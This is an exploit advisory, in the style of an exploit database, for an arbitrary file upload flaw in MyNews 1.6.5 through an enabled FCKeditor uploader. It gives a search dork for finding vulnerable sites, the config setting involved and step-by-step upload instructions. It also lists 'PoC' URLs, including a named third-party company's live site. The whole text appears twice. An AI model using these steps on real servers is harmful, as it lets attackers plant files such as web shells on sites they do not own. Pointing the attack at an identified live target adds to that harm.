MyNews Arbitrary File Upload Vuln
[o] MyNews Arbitrary File Upload Vulnerability
Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe
[o] Exploit
FCKeditor/editor/filemanager/upload/php/config.php
// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = true ;
http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html
in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"
http://localhost/[path]/files/your_file.txt
[o] PoC
http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html
Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe
[o] Exploit
FCKeditor/editor/filemanager/upload/php/config.php
// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = true ;
http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html
in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"
http://localhost/[path]/files/your_file.txt
[o] PoC
http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html